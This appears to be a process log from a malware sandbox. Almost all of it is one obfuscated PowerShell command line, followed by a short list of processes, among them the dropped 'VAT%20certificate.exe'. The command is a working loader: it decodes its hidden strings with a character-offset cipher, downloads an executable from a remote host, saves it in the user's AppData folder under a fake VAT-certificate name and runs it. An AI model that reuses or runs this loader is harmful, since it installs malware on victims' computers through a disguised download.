powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function tGIue($EpIxmuGVuZLbfA, $aTGikfPRsZRV){[IO.File]::WriteAllBytes($EpIxmuGVuZLbfA, $aTGikfPRsZRV)};function bXhQxPG($EpIxmuGVuZLbfA){if($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67043,67051,67051))) -eq $True){rundll32.exe $EpIxmuGVuZLbfA }elseif($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67055,67058,66992))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $EpIxmuGVuZLbfA}elseif($EpIxmuGVuZLbfA.EndsWith((sJQmIfmn @(66989,67052,67058,67048))) -eq $True){misexec /qn /i $EpIxmuGVuZLbfA}else{Start-Process $EpIxmuGVuZLbfA}};function EZaqwmkrpm($YYPOnwifQTinecw){$UnrKhxCyrLrSiUjqf = New-Object (sJQmIfmn @(67021,67044,67059,66989,67030,67044,67041,67010,67051,67048,67044,67053,67059));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$aTGikfPRsZRV = $UnrKhxCyrLrSiUjqf.DownloadData($YYPOnwifQTinecw);return $aTGikfPRsZRV};function sJQmIfmn($rdZrreW){$UDcOSFQvyucyt=66943;$hIpVaXCveA=$Null;foreach($LhcCvADFdJ in $rdZrreW){$hIpVaXCveA+=[char]($LhcCvADFdJ-$UDcOSFQvyucyt)};return $hIpVaXCveA};function VpeUnfmvvUnskxx(){$joDRUbaqCRhqCUu = $env:AppData + '\';$ZYEuq = $joDRUbaqCRhqCUu + 'VAT%20certificate.exe'; if (Test-Path -Path $ZYEuq){bXhQxPG $ZYEuq;}Else{ $rqdhhzPQQqHkKt = EZaqwmkrpm (sJQmIfmn @(67047,67059,67059,67055,67001,66990,66990,66992,67000,66999,66989,66993,66994,66989,66993,66991,66992,66989,66999,67000,66990,67062,67040,67057,67052,66990,67029,67008,67027,66980,66993,66991,67042,67044,67057,67059,67048,67045,67048,67042,67040,67059,67044,66989,67044,67063,67044));tGIue $ZYEuq $rqdhhzPQQqHkKt;bXhQxPG $ZYEuq;};;;;}VpeUnfmvvUnskxx;
2160VAT%20certificate.exe "C:\Users\test22\AppData\Roaming\VAT%20certificate.exe"
2316firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
2908explorer.exe C:\Windows\Explorer.EXE
1236